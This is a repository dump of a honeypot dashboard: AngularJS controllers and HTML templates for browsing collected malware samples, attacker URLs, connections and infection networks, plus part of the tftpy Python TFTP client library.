)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i.test(navigator.userAgent.substr(0,4))) isMobile = true;\n\nvar app = angular.module('honey', [\"ngRoute\", \"chart.js\", \"ngVis\"]);\n\napp.config(function($routeProvider) {\n\t$routeProvider\n\t.when(\"/samples\", {\n\t\ttemplateUrl : \"samples.html\",\n\t\tcontroller : \"samples\"\n\t})\n\t.when(\"/sample/:sha256\", {\n\t\ttemplateUrl : \"sample.html\",\n\t\tcontroller : \"sample\"\n\t})\n\t.when(\"/urls\", {\n\t\ttemplateUrl : \"urls.html\",\n\t\tcontroller : \"urls\"\n\t})\n\t.when(\"/url/:url\", {\n\t\ttemplateUrl : \"url.html\",\n\t\tcontroller : \"url\"\n\t})\n\t.when(\"/tag/:tag\", {\n\t\ttemplateUrl : \"tag.html\",\n\t\tcontroller : \"tag\"\n\t})\n\t.when(\"/connection/:id\", {\n\t\ttemplateUrl : \"connection.html\",\n\t\tcontroller : \"connection\"\n\t})\n\t.when(\"/asn/:asn\", {\n\t\ttemplateUrl : \"asn.html\",\n\t\tcontroller : \"asn\"\n\t})\n\t.when(\"/networks\", {\n\t\ttemplateUrl : \"networks.html\",\n\t\tcontroller : \"networks\"\n\t})\n\t.when(\"/network/:id\", {\n\t\ttemplateUrl : \"network.html\",\n\t\tcontroller : \"network\"\n\t})\n\t.when(\"/connections\", {\n\t\ttemplateUrl : \"connectionlist.html\",\n\t\tcontroller : \"connectionlist\"\n\t})\n\t.when(\"/tags\", {\n\t\ttemplateUrl : \"tags.html\",\n\t\tcontroller : \"tags\"\n\t})\n\t.when(\"/admin\", {\n\t\ttemplateUrl : \"admin.html\",\n\t\tcontroller : \"admin\"\n\t})\n\t.when(\"/\", {\n\t\ttemplateUrl : \"overview.html\",\n\t\tcontroller : \"overview\"\n\t})\n\t.otherwise({\n\t\ttemplate: '<h1>Error</h1>View not found.<br><a href=\"#/\">Go to index</a>'\n\t});\n});\n\napp.controller('overview', function($scope, $http, $routeParams, $location) {\n\n\t$scope.urls = null;\n\t$scope.samples = null;\n\t$scope.connections = null;\n\n\t$scope.formatDate = formatDateTime;\n\t$scope.nicenull = nicenull;\n\t$scope.short = short;\n\t$scope.encurl = encurl;\n\t$scope.decurl = decurl;\n\t$scope.fakenames = fakenames;\n\n    $scope.chart_options = {\n        \"animation\": isMobile ? false : {}\n    };\n\n\t$http.get(api + \"/url/newest\").then(function (httpResult) {\n\t\t$scope.urls = httpResult.data;\n\t});\n\n\t$http.get(api + \"/sample/newest\").then(function (httpResult) {\n\t\t$scope.samples = httpResult.data;\n\t});\n\n\t$http.get(api + \"/connections\").then(function (httpResult) {\n\t\t$scope.connections = httpResult.data;\n\t});\n\n\t$http.get(api + \"/connection/statistics/per_country\").then(function (httpResult) {\n\t\thttpResult.data.sort(function(a, b) { return b[0] - a[0] });\n\n\t\t$scope.country_stats_values = httpResult.data.map(function(x) {return x[0]});\n\t\t$scope.country_stats_labels = httpResult.data.map(function(x) {return COUNTRY_LIST[x[1]]});\n\t\t$scope.country_stats_data   = httpResult.data.map(function(x) {return x[1]});\n\t});\n\n\t$scope.clickchart_countries = function(a,b,c,d,e) {\n\t\tvar c = $scope.country_stats_data[c._index];\n\t\t$location.path(\"/connections\").search({country: c});\n\t\t$scope.$apply()\n\t};\n\n});\n\napp.controller('samples', function($scope, $http, $routeParams) {\n\n\t$scope.samples = null;\n\n\t$scope.formatDate = formatDateTime;\n\t$scope.nicenull = nicenull;\n\t$scope.short = short;\n\t$scope.encurl = encurl;\n\t$scope.decurl = decurl;\n\t$scope.fakenames = fakenames;\n\n\t$http.get(api + \"/sample/newest\").then(function (httpResult) {\n\t\t$scope.samples = httpResult.data;\n\t});\n\n});\n\napp.controller('sample', function($scope, $http, $routeParams) {\n\n\t$scope.sample = null;\n\n\t$scope.formatDate = formatDateTime;\n\t$scope.nicenull = nicenull;\n\t$scope.short = short;\n\t$scope.encurl = encurl;\n\t$scope.decurl = decurl;\n\t$scope.fakenames = fakenames;\n\n\t$scope.short = function (str) {\n\t\tif (str)\n\t\t\treturn str.substring(0, 16) + \"...\";\n\t\telse\n\t\t\treturn \"None\";\n\t};\n\n\tvar sha256 = $routeParams.sha256;\n\t$http.get(api + \"/sample/\" + sha256).then(function (httpResult) {\n\t\t$scope.sample = httpResult.data;\n\t});\n\n});\n\napp.controller('urls', function($scope, $http, $routeParams) {\n\n\t$scope.url = null;\n\n\t$scope.formatDate = formatDateTime;\n\t$scope.nicenull = nicenull;\n\t$scope.short = short;\n\t$scope.encurl = encurl;\n\t$scope.decurl = decurl;\n\t$scope.fakenames = fakenames;\n\n\t$http.get(api + \"/url/newest\").then(function (httpResult) {\n\t\t$scope.urls = httpResult.data;\n\t});\n\n});\n\napp.controller('tags', function($scope, $http, $routeParams) {\n\n\t$scope.formatDate = formatDateTime;\n\t$scope.nicenull = nicenull;\n\t$scope.short = short;\n\t$scope.encurl = encurl;\n\t$scope.decurl = decurl;\n\t$scope.fakenames = fakenames;\n\n\t$http.get(api + \"/tags\").then(function (httpResult) {\n\t\t$scope.tags = httpResult.data;\n\t});\n\n});\n\nvar graph_accumulate_hours = 6;\nvar graph_tstep = 60 * 60 * graph_accumulate_hours;\nfunction roundDate(date) {\n\treturn Math.floor(date / graph_tstep);\n};\n\nfunction network_graph_data(networks)\n{\n\n\tvar firsttime = +Infinity;\n\tvar lasttime  = -Infinity;\n\tvar datasets  = [];\n\n\tfor (var i = 0; i < networks.length; i++)\n\t{\n\t\tvar network = networks[i];\n\t\tvar firsttime_net = Math.min.apply(null, network.connectiontimes);\n\t\tvar lasttime_net  = Math.max.apply(null, network.connectiontimes);\n\n\t\tfirsttime = Math.min(firsttime, firsttime_net);\n\t\tlasttime  = Math.min(lasttime,  lasttime_net);\n\t}\n\n\tvar first = roundDate(firsttime);\n\tvar last  = roundDate(lasttime);\n\tvar now   = time();\n\n\tfor (var j = 0; j < networks.length; j++)\n\t{\n\t\tvar network = networks[j];\n\t\tvar data = new Array((roundDate(now) - first) + 1).fill(0);\n\t\tfor (var i = 0; i < network.connectiontimes.length; i++)\n\t\t{\n\t\t\tvar t = network.connectiontimes[i];\n\t\t\tvar r = roundDate(now - t);\n\t\t\tdata[r] += (1/graph_accumulate_hours);\n\t\t}\n\t\t\n\t\tdata.reverse();\n\t\tdata = data.map(function (x) {return Math.round(x*100)/100;});\n\t\tdatasets.push(data);\n\t}\n\n\tvar labels = datasets[0].map(function(v,i,a) {\n\t\tvar tdiff = (a.length-i-1) * graph_tstep;\n\t\treturn formatDateTime(now - tdiff);\n\t});\n\n\treturn {\n\t\t\"datasets\":  datasets,\n\t\t\"labels\":    labels,\n\t\t\"firsttime\": firsttime,\n\t\t\"lasttime\":  lasttime\n\t};\n}\n\napp.controller('networks', function($scope, $http, $routeParams) {\n\n\t$scope.formatDate = formatDateTime;\n\t$scope.nicenull = nicenull;\n\t$scope.short  = short;\n\t$scope.encurl = encurl;\n\t$scope.decurl = decurl;\n\t$scope.fakenames = fakenames;\n\n\tvar networks_show_graph = 4;\n\tvar networks_got        = 0;\n\tvar networks_requested  = 0;\n\n\t$http.get(api + \"/networks\").then(function (httpResult) {\n\t\t$scope.networks = httpResult.data;\n\t\t\n\t\tfor (var i = 0; i < $scope.networks.length; i++)\n\t\t{\n\t\t\tvar item = $scope.networks[i];\n\t\t\titem.order = item.firstconns;\n\t\t}\n\n\t\t$scope.networks.sort(function (a, b) { return a.order-b.order; });\n\t\t$scope.networks.reverse();\n\t\tnetworks_requested = Math.min(networks_show_graph, $scope.networks.length);\n\t\t$scope.networks_graph = [];\n\t\t$scope.timechart_series = [];\n\t\t\n\t\t$http.get(api + \"/network/biggest_history\").then(function (httpResult) {\n\t\t\tvar nets = httpResult.data;\n\t\t\t\n\t\t\t$scope.timechart_data = [];\n\t\t\t\n\t\t\tfor (var i = 0; i < nets.length; i++) {\n\t\t\t\t$scope.timechart_data.push(\n\t\t\t\t\tnets[i].data.map(function(x){ return x[1]; })\n\t\t\t\t);\n\t\t\t\t$scope.timechart_series.push(nets[i].network.malware.name + \" #\" + nets[i].network.id);\n\t\t\t}\n\t\t\t\n\t\t\t$scope.timechart_labels = nets[0].data.map(function(x){ return formatDay(x[0]); });\n\t\t\t\n\t\t\tconsole.log($scope.timechart_data);\n\t\t\tconsole.log($scope.timechart_labels);\n\t\t\t\n\t\t\tnetworks_got = nets.length;\n\t\t});\n\t\t\n\t});\n\t\n\t$scope.draw = function() {\n\t\tvar ret = network_graph_data($scope.networks_graph);\n\t\t\n\t\t$scope.timechart_data    = ret.datasets;\n\t\t$scope.timechart_labels  = ret.labels;\n\t};\n\n\t$scope.filterNoSamples = function(network) {\n\t\treturn true; // network.samples.length > 0;\n\t};\n\t\n\t$scope.timechart_options = {\n\t\t\"animation\": isMobile ? false : {},\n\t\t\"responsive\": true,\n\t\t\"maintainAspectRatio\": false,\n\t\tlegend: {\n\t\t\tdisplay:  true,\n\t\t\tposition: 'top',\n\t\t},\n\t\telements: {\n        line: {\n                fill: false\n        }\n\t\t}\n    };\n\n});\n\napp.controller('network', function($scope, $http, $routeParams) {\n\n\t$scope.formatDate = formatDateTime;\n\t$scope.nicenull = nicenull;\n\t$scope.short  = short;\n\t$scope.encurl = encurl;\n\t$scope.decurl = decurl;\n\t$scope.fakenames = fakenames;\n\n\tvar id = $routeParams.id;\n\t\n\t$http.get(api + \"/network/\" + id).then(function (httpResult) {\n\t\t$scope.network = httpResult.data;\n\n\t\tvar ret = network_graph_data([$scope.network]);\n\t\t\n\t\t$scope.network.firsttime = ret.firsttime;\n\t\t$scope.network.lasttime  = ret.lasttime;\n\t\t$scope.timechart_data    = ret.datasets;\n\t\t$scope.timechart_labels  = ret.labels;\n\t\t\n\t});\n\t\n\t$scope.timechart_options = {\n\t\t\"animation\": isMobile ? false : {},\n\t\t\"responsive\": true,\n\t\t\"maintainAspectRatio\": false,\n    };\n    \n    $scope.graph_events = {\n    \t\"click\": function(ev) {\n    \t\tif (ev.nodes.length == 1) {\n    \t\t\tvar n    = ev.nodes[0];\n    \t\t\tvar d    = n.substr(2);\n    \t\t\tvar link = null;\n    \t\t\t\n\t\t\t\tif (n.startsWith(\"i:\")) link = \"#/connections?ip=\" + d;\n\t\t\t\tif (n.startsWith(\"s:\")) link = \"#/sample/\" + d;\n\t\t\t\tif (n.startsWith(\"u:\")) link = \"#/url/\" + encurl(d);\n\t\t\t\t\n\t\t\t\twindow.location.href = link;\n    \t\t\t\n    \t\t}\n    \t}\n    };\n\t\n\t$scope.graph_options = {\n\t\t\"interaction\": { \"tooltipDelay\": 0 },\n\t};\n\t$scope.graph_data = {\n\t\t\"nodes\": [],\n\t\t\"edges\": []\n\t};\n\t\n\t$scope.graph_enabled = false;\n\t$scope.loadgraph = function() {\n\t\tvar graph_nodes     = [];\n\t\tvar graph_nodes_set = {};\n\t\tvar node = function(n) {\n\t\t\tif (! (n in graph_nodes_set)) {\n\t\t\t\tvar color = \"#dddddd\";\t\t\t\t\t\t// ip\n\t\t\t\tif (n.startsWith(\"s:\")) color = \"#ffbbbb\";\t// sample\n\t\t\t\tif (n.startsWith(\"u:\")) color = \"#bbbbff\";\t// url\n\t\t\t\n\t\t\t\tgraph_nodes.push({\n\t\t\t\t\t\"id\":    n,\n\t\t\t\t\t\"label\": \"\",\n\t\t\t\t\t\"title\": n.substring(2),\n\t\t\t\t\t\"color\": color\n\t\t\t\t});\n\t\t\t\tgraph_nodes_set[n] = true;\n\t\t\t}\n\t\t};\n\n\t\tvar graph_edges = $scope.network.has_infected.map(function(e) {\n\t\t\tnode(e[0]);\n\t\t\tnode(e[1]);\n\t\t\treturn { \"from\": e[0], \"to\": e[1], \"id\": e[0] + \"-\" + e[1] };\n\t\t});\n\n\t\t$scope.graph_data = {\n\t\t\t\"nodes\": graph_nodes,\n\t\t\t\"edges\": graph_edges\n\t\t};\n\t\t$scope.graph_enabled = true;\n\t};\n\n});\n\napp.controller('url', function($scope, $http, $routeParams) {\n\n\t$scope.url = null;\n\n\t$scope.formatDate = formatDateTime;\n\t$scope.nicenull = nicenull;\n\t$scope.short = short;\n\t$scope.encurl = encurl;\n\t$scope.decurl = decurl;\n\t$scope.fakenames = fakenames;\n\n\tvar url = $routeParams.url;\n\t$http.get(api + \"/url/\" + url).then(function (httpResult) {\n\t\t$scope.url = httpResult.data;\n\t\t$scope.url.countryname = COUNTRY_LIST[$scope.url.country];\n\t});\n\n});\n\napp.controller('tag', function($scope, $http, $routeParams) {\n\n\t$scope.tag = null;\n\n\t$scope.formatDate = formatDateTime;\n\t$scope.nicenull = nicenull;\n\t$scope.short = short;\n\t$scope.encurl = encurl;\n\t$scope.decurl = decurl;\n\t$scope.fakenames = fakenames;\n\n\tvar tag = $routeParams.tag;\n\t$http.get(api + \"/tag/\" + tag).then(function (httpResult) {\n\t\t$scope.tag         = httpResult.data;\n        $scope.connections = $scope.tag.connections;\n\t});\n\n});\n\napp.controller('connection', function($scope, $http, $routeParams) {\n\n\t$scope.connection = null;\n\t$scope.lines = [];\n\n\t$scope.formatDate = formatDateTime;\n\t$scope.nicenull = nicenull;\n\t$scope.short = short;\n\t$scope.encurl = encurl;\n\t$scope.decurl = decurl;\n\t$scope.displayoutput = true;\n\t$scope.fakenames = fakenames;\n\n\tvar id = $routeParams.id;\n\t$http.get(api + \"/connection/\" + id).then(function (httpResult) {\n\t\t$scope.connection = httpResult.data;\n\n\t\t$scope.connection.countryname = COUNTRY_LIST[$scope.connection.country];\n\t\t\n\t\tvar last_i = $scope.connection.stream.length - 1;\n\t\t$scope.connection.duration    = $scope.connection.stream[last_i].ts;\n\n\t});\n\n});\n\napp.controller('connectionlist', function($scope, $http, $routeParams, $location) {\n\n\t$scope.connection = null;\n\t$scope.lines = [];\n\n\t$scope.formatDate = formatDateTime;\n\t$scope.nicenull = nicenull;\n\t$scope.short = short;\n\t$scope.encurl = encurl;\n\t$scope.decurl = decurl;\n\t$scope.COUNTRY_LIST = COUNTRY_LIST;\n\t$scope.fakenames = fakenames;\n\n\t$scope.filter = $routeParams;\n\n\tvar url = api + \"/connections?\";\n\n\tfor (key in $routeParams)\n\t{\n\t\turl = url + key + \"=\" + $routeParams[key] + \"&\";\n\t}\n\n\t$http.get(url).then(function (httpResult) {\n\t\t$scope.connections = httpResult.data;\n\n\t\t$scope.connections.map(function(connection) {\n\t\t\tconnection.contryname = COUNTRY_LIST[connection.country];\n\t\t\treturn connection;\n\t\t});\n\n\t});\n\n\t$scope.nextpage = function() {\n\t\tvar filter = $scope.filter;\n\n\t\tfilter['older_than'] = $scope.connections[$scope.connections.length - 1].date;\n\n\t\t$location.path(\"/connections\").search(filter);\n\t\t$scope.$apply();\n\t};\n\n});\n\napp.controller('asn', function($scope, $http, $routeParams, $location) {\n\n\t$scope.connection = null;\n\t$scope.lines = [];\n\n\t$scope.formatDate = formatDateTime;\n\t$scope.nicenull = nicenull;\n\t$scope.short = short;\n\t$scope.encurl = encurl;\n\t$scope.decurl = decurl;\n\t$scope.COUNTRY_LIST = COUNTRY_LIST;\n\t$scope.REGISTRIES = {\n\t\t\"arin\": \"American Registry for Internet Numbers\",\n\t\t\"ripencc\": \"RIPE Network Coordination Centre\",\n\t\t\"lacnic\": \"Latin America and Caribbean Network Information Centre\",\n\t\t\"afrinic\": \"African Network Information Centre\",\n\t\t\"apnic\": \"Asia-Pacific Network Information Centre\"\n\t};\n\t$scope.fakenames = fakenames;\n\n\tvar asn = $routeParams.asn;\n\t$scope.filter = { \"asn_id\" : asn};\n\n\t$http.get(api + \"/asn/\" + asn).then(function (httpResult) {\n\t\t$scope.asn = httpResult.data;\n\t\t$scope.asn.countryname = COUNTRY_LIST[$scope.asn.country];\n\n\t\t$scope.connections = $scope.asn.connections.sort(function(x, y) {return y.date - x.date} ).slice(0,8);\n\t\t$scope.urls = $scope.asn.urls.sort(function(x, y) {return y.date - x.date} ).slice(0,8);\n\t});\n\n});\n\napp.controller('admin', function($scope, $http, $routeParams, $location) {\n\n    $scope.loggedin = false;\n    $scope.errormsg = null;\n\n    $scope.username = null;\n    $scope.password = null;\n\n    $scope.new_username = null;\n    $scope.new_password = null;\n\n\t$scope.login = function() {\n        var auth = btoa($scope.username + \":\" + $scope.password);\n        $http.defaults.headers.common['Authorization'] = 'Basic ' + auth;\n        $http.get(api + \"/login\").then(function (httpResult) {\n            $scope.errormsg = \"Logged in as \" + $scope.username;\n            $scope.loggedin = true;\n        }, function (httpError) {\n            $scope.errormsg = \"Bad credentials\";\n        });\n        $scope.password = null;\n    };\n\n\t$scope.logout = function() {\n        delete $http.defaults.headers.common['Authorization'];\n        $scope.errormsg = null;\n        $scope.loggedin = false;\n        $scope.username = null;\n        $scope.password = null;\n    };\n\n    $scope.addUser = function() {\n        var newuser = {\n            \"username\": $scope.new_username,\n            \"password\": $scope.new_password\n        };\n        $http.put(api + \"/user/\" + newuser.username, newuser).then(function (httpResult) {\n            $scope.errormsg     = \"Created new user \" + $scope.new_username;\n            $scope.new_username = null;\n            $scope.new_password = null;\n        }, function (httpError) {\n            $scope.errormsg     = \"Error creating new user \\\"\" + $scope.new_username + \"\\\" :(\";\n            $scope.new_username = null;\n            $scope.new_password = null;\n        });\n    };\n\n});\n"
  },
  {
    "path": "html/samples.html",
    "content": "<h2>Samples</h2>\n\n<table class=\"table table-condensed\">\n\n\t<tr>\n\t\t<th class=\"hidden-xs\">SHA256</th>\n\t\t<th>Name</th>\n\t\t<th>Size (Bytes)</th>\n\t\t<th>First Seen</th>\n\t\t<th class=\"hidden-xs\">N⁰ Urls</th>\n\t</tr>\n\t<tr ng-repeat=\"sample in samples\">\n\t\t<td class=\"hidden-xs\"><span ng-show=\"sample.sha256 != null\"><a href=\"{{ '#/sample/' + sample.sha256 }}\">{{sample.sha256}}</a></span></td>\n\t\t<td><a href=\"{{ '#/sample/' + sample.sha256 }}\">{{ sample.name }}</a></td>\n\t\t<td>{{ sample.length }}</a></td>\n\t\t<td>{{ formatDate(sample.date) }}</td>\n\t\t<td class=\"hidden-xs\">{{ sample.urls }}</td>\n\t</tr>\n\n</table>\n"
  },
  {
    "path": "html/tag.html",
    "content": "<h1>Tag Info</h1>\n\n<table class=\"table\">\n\n\t<tr><td>Name</td><td>{{ tag.name }}</td></tr>\n\t<tr><td>Code</td><td><span style=\"font-family: monospace;\">{{ tag.code }}</span></td></tr>\n\t<tr><td>N° Hits</td><td>{{ tag.connections.length }}</td></tr>\n\n</table>\n\n<h2>Connections</h2>\n\n<div ng-include=\"'connectionlist-embed.html'\"></div>\n"
  },
  {
    "path": "html/tags.html",
    "content": "<h1>Tags</h1>\n\n<table class=\"table table-condensed\">\n\n\t<tr>\n\t\t<th>Name</th>\n\t\t<th>Code</th>\n\t\t<th>N⁰ Hits</th>\n\t</tr>\n\t<tr ng-repeat=\"tag in tags\">\n\t\t<td><a href=\"{{ '#/tag/' + tag.name }}\">{{ tag.name }}</a></td>\n\t\t<td><span style=\"font-family: monospace;\">{{ tag.code }}</span></td>\n\t\t<td>{{ tag.connections }}</td>\n\t</tr>\n\n</table>\n\n"
  },
  {
    "path": "html/url.html",
    "content": "<h1>URL Info</h1>\n\n<table class=\"table\">\n\n\t<tr><td>URL</td><td>{{ url.url }}</td></tr>\n\t<tr><td>First seen</td><td>{{ formatDate(url.date) }}</td></tr>\n\t<tr><td>Resolves to</td>\n\t\t<td>\n\t\t\t<span ng-show=\"url.country\"><img src=\"img/flags/{{ url.country.toLowerCase() }}.png\"> {{ url.countryname }} <a href=\"#/connections?country={{ url.country }}\"><span class=\"glyphicon glyphicon-screenshot\"></span></a></span><br>\n\t\t\t<span>{{ url.ip }} </span><br>\n\t\t\t<span ng-show=\"url.asn\">AS{{ url.asn.asn }} <b>{{ url.asn.name }}</b>\n\t\t\t\t<a href=\"#/asn/{{ url.asn.asn }}\"><span class=\"glyphicon glyphicon-screenshot\"></span></a>\n\t\t\t</span><br>\n\t\t</td>\n\t</tr>\n\n</table>\n\n<h2>Sample</h2>\n\n<table class=\"table\" ng-show=\"url.sample != null\">\n\n\t<tr><td>First seen</td><td>{{ formatDate(url.sample.date) }}</td></tr>\n\t<tr><td>First seen file name</td><td>{{ url.sample.name }}</td></tr>\n\t<tr><td>File size</td><td>{{ url.sample.length }} Bytes</td></tr>\n\t<tr><td>SHA256</td><td><a href=\"{{ '#/sample/' + url.sample.sha256 }}\">{{ url.sample.sha256 }}</a></td></tr>\n\t<tr><td>Virustotal result</td><td>{{ nicenull(url.sample.result, \"Not Scanned yet\") }}</td></tr>\n\n</table>\n\n<h2>Connections included this URL</h2>\n\n<table class=\"table\">\n\n\t<tr>\n\t\t<th>Date</th>\n\t\t<th>IP</th>\n\t\t<th>Username</th>\n\t\t<th>Password</th>\n\t</tr>\n\t<tr ng-repeat=\"connection in url.connections\">\n\t\t<td><a href=\"{{ '#/connection/' + connection.id }}\">{{ formatDate(connection.date) }}</a></td>\n\t\t<td>{{ connection.ip }}</td>\n\t\t<td>{{ connection.user }}</td>\n\t\t<td>{{ connection.pass }}</td>\n\t</tr>\n\n</table>"
  },
  {
    "path": "html/urls.html",
    "content": "<h1>Urls</h1>\n\n<table class=\"table table-condensed\">\n\n\t<tr>\n\t\t<th>Country</th>\n\t\t<th>Url</th>\n\t\t<th>Date</th>\n\t\t<th class=\"hidden-xs\">Sample</th>\n\t\t<th class=\"hidden-xs\">N⁰ Connections</th>\n\t</tr>\n\t<tr ng-repeat=\"url in urls\">\n\t\t<td><span ng-show=\"url.country\"><img src=\"img/flags/{{ url.country.toLowerCase() }}.png\"> {{ url.countryname }} <a href=\"#/connections?country={{ url.country }}\"><span class=\"glyphicon glyphicon-screenshot\"></span></a></span></td>\n\t\t<td><a href=\"{{ '#/url/' + encurl(url.url) }}\">{{ url.url }}</a></td>\n\t\t<td>{{ formatDate(url.date) }}</td>\n\t\t<td class=\"hidden-xs\"><span ng-show=\"url.sample != null\"><a href=\"{{ '#/sample/' + url.sample }}\">{{ short(url.sample, 16) }}</a></span></td>\n\t\t<td class=\"hidden-xs\">{{ url.connections }}</td>\n\t</tr>\n\n</table>\n"
  },
  {
    "path": "requirements.txt",
    "content": "setuptools\nwerkzeug\nflask\nflask-httpauth\nflask-socketio\nsqlalchemy\nrequests\ndecorator\ndnspython\nipaddress\nsimpleeval\npyyaml\nargon2\neventlet\n"
  },
  {
    "path": "tftpy/TftpClient.py",
    "content": "\"\"\"This module implements the TFTP Client functionality. Instantiate an\ninstance of the client, and then use its upload or download method. Logging is\nperformed via a standard logging object set in TftpShared.\"\"\"\n\nimport types\nfrom TftpShared import *\nfrom TftpPacketTypes import *\nfrom TftpContexts import TftpContextClientDownload, TftpContextClientUpload\n\nclass TftpClient(TftpSession):\n    \"\"\"This class is an implementation of a tftp client. Once instantiated, a\n    download can be initiated via the download() method, or an upload via the\n    upload() method.\"\"\"\n\n    def __init__(self, host, port, options={}):\n        TftpSession.__init__(self)\n        self.context = None\n        self.host = host\n        self.iport = port\n        self.filename = None\n        self.options = options\n        if self.options.has_key('blksize'):\n            size = self.options['blksize']\n            tftpassert(types.IntType == type(size), \"blksize must be an int\")\n            if size < MIN_BLKSIZE or size > MAX_BLKSIZE:\n                raise TftpException, \"Invalid blksize: %d\" % size\n\n    def download(self, filename, output, packethook=None, timeout=SOCK_TIMEOUT):\n        \"\"\"This method initiates a tftp download from the configured remote\n        host, requesting the filename passed. It saves the file to a local\n        file specified in the output parameter. If a packethook is provided,\n        it must be a function that takes a single parameter, which will be a\n        copy of each DAT packet received in the form of a TftpPacketDAT\n        object. The timeout parameter may be used to override the default\n        SOCK_TIMEOUT setting, which is the amount of time that the client will\n        wait for a receive packet to arrive.\n\n        Note: If output is a hyphen then stdout is used.\"\"\"\n        # We're downloading.\n        log.debug(\"Creating download context with the following params:\")\n        log.debug(\"host = %s, port = %s, filename = %s, output = %s\"\n            % (self.host, self.iport, filename, output))\n        log.debug(\"options = %s, packethook = %s, timeout = %s\"\n            % (self.options, packethook, timeout))\n        self.context = TftpContextClientDownload(self.host,\n                                                 self.iport,\n                                                 filename,\n                                                 output,\n                                                 self.options,\n                                                 packethook,\n                                                 timeout)\n        self.context.start()\n        # Download happens here\n        self.context.end()\n\n        metrics = self.context.metrics\n\n        log.info('')\n        log.info(\"Download complete.\")\n        if metrics.duration == 0:\n            log.info(\"Duration too short, rate undetermined\")\n        else:\n            log.info(\"Downloaded %.2f bytes in %.2f seconds\" % (metrics.bytes, metrics.duration))\n            log.info(\"Average rate: %.2f kbps\" % metrics.kbps)\n        log.info(\"%.2f bytes in resent data\" % metrics.resent_bytes)\n        log.info(\"Received %d duplicate packets\" % metrics.dupcount)\n\n    def upload(self, filename, input, packethook=None, timeout=SOCK_TIMEOUT):\n        \"\"\"This method initiates a tftp upload to the configured remote host,\n        uploading the filename passed.  If a packethook is provided, it must\n        be a function that takes a single parameter, which will be a copy of\n        each DAT packet sent in the form of a TftpPacketDAT object. The\n        timeout parameter may be used to override the default SOCK_TIMEOUT\n        setting, which is the amount of time that the client will wait for a\n        DAT packet to be ACKd by the server.\n\n        The input option is the full path to the file to upload, which can\n        optionally be '-' to read from stdin.\n\n        Note: If output is a hyphen then stdout is used.\"\"\"\n        self.context = TftpContextClientUpload(self.host,\n                                                 self.iport,\n                                                 filename,\n                                                 input,\n                                                 self.options,\n                                                 packethook,\n                                                 timeout)\n        self.context.start()\n        # Upload happens here\n        self.context.end()\n\n        metrics = self.context.metrics\n\n        log.info('')\n        log.info(\"Upload complete.\")\n        if metrics.duration == 0:\n            log.info(\"Duration too short, rate undetermined\")\n        else:\n            log.info(\"Uploaded %d bytes in %.2f seconds\" % (metrics.bytes, metrics.duration))\n            log.info(\"Average rate: %.2f kbps\" % metrics.kbps)\n        log.info(\"%.2f bytes in resent data\" % metrics.resent_bytes)\n        log.info(\"Resent %d packets\" % metrics.dupcount)\n"
  },
  {
    "path": "tftpy/TftpContexts.py",
    "content": "\"\"\"This module implements all contexts for state handling during uploads and\ndownloads, the main interface to which being the TftpContext base class.\n\nThe concept is simple. Each context object represents a single upload or\ndownload, and the state object in the context object represents the current\nstate of that transfer. The state object has a handle() method that expects\nthe next packet in the transfer, and returns a state object until the transfer\nis complete, at which point it returns None. That is, unless there is a fatal\nerror, in which case a TftpException is returned instead.\"\"\"\n\nfrom TftpShared import *\nfrom TftpPacketTypes import *\nfrom TftpPacketFactory import TftpPacketFactory\nfrom TftpStates import *\nimport socket, time, sys\n\n###############################################################################\n# Utility classes\n###############################################################################\n\nclass TftpMetrics(object):\n    \"\"\"A class representing metrics of the transfer.\"\"\"\n    def __init__(self):\n        # Bytes transferred\n        self.bytes = 0\n        # Bytes re-sent\n        self.resent_bytes = 0\n        # Duplicate packets received\n        self.dups = {}\n        self.dupcount = 0\n        # Times\n        self.start_time = 0\n        self.end_time = 0\n        self.duration = 0\n        # Rates\n        self.bps = 0\n        self.kbps = 0\n        # Generic errors\n        self.errors = 0\n\n    def compute(self):\n        # Compute transfer time\n        self.duration = self.end_time - self.start_time\n        if self.duration == 0:\n            self.duration = 1\n        log.debug(\"TftpMetrics.compute: duration is %s\" % self.duration)\n        self.bps = (self.bytes * 8.0) / self.duration\n        self.kbps = self.bps / 1024.0\n        log.debug(\"TftpMetrics.compute: kbps is %s\" % self.kbps)\n        for key in self.dups:\n            self.dupcount += self.dups[key]\n\n    def add_dup(self, pkt):\n        \"\"\"This method adds a dup for a packet to the metrics.\"\"\"\n        log.debug(\"Recording a dup of %s\" % pkt)\n        s = str(pkt)\n        if self.dups.has_key(s):\n            self.dups[s] += 1\n        else:\n            self.dups[s] = 1\n        tftpassert(self.dups[s] < MAX_DUPS, \"Max duplicates reached\")\n\n###############################################################################\n# Context classes\n###############################################################################\n\nclass TftpContext(object):\n    \"\"\"The base class of the contexts.\"\"\"\n\n    def __init__(self, host, port, timeout, dyn_file_func=None):\n        \"\"\"Constructor for the base context, setting shared instance\n        variables.\"\"\"\n        self.file_to_transfer = None\n        self.fileobj = None\n        self.options = None\n        self.packethook = None\n        self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n        self.sock.settimeout(timeout)\n        self.timeout = timeout\n        self.state = None\n        self.next_block = 0\n        self.factory = TftpPacketFactory()\n        # Note, setting the host will also set self.address, as it's a property.\n        self.host = host\n        self.port = port\n        # The port associated with the TID\n        self.tidport = None\n        # Metrics\n        self.metrics = TftpMetrics()\n        # Fluag when the transfer is pending completion.\n        self.pending_complete = False\n        # 